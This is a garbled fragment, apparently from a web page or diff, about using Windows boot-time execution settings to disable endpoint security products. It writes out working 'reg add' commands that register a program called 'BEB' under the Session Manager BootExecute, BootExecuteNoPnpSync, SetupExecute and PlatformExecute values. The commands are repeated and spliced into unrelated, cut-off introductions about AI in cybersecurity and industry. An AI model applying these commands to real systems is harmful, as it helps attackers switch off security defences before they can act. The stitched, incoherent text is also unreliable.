 The code contained within the project is an example demonstration of exploiting this “feature” to disable Endpoint Security Products before they have a chance to stop us.

-reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecute" /t REG_MULTI_SZ /d "autocheck autochk *\0BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecuteNoPnpSync" /t REG_MULTI_SZ /d "BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "SetupExecute" /t REG_MULTI_SZ /d "BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PlatformExecute" /t REG_MULTI_SZ /d "BEB" /f Introduction Artificial Intelligence is changing how cybersecurity professionals work, especially in penetration testing.
-Tools that…
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecute" /t REG_MULTI_SZ /d "autocheck autochk *\0BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecuteNoPnpSync" /t REG_MULTI_SZ /d "BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "SetupExecute" /t REG_MULTI_SZ /d "BEB" /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PlatformExecute" /t REG_MULTI_SZ /d "BEB" /f Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations.
+However,…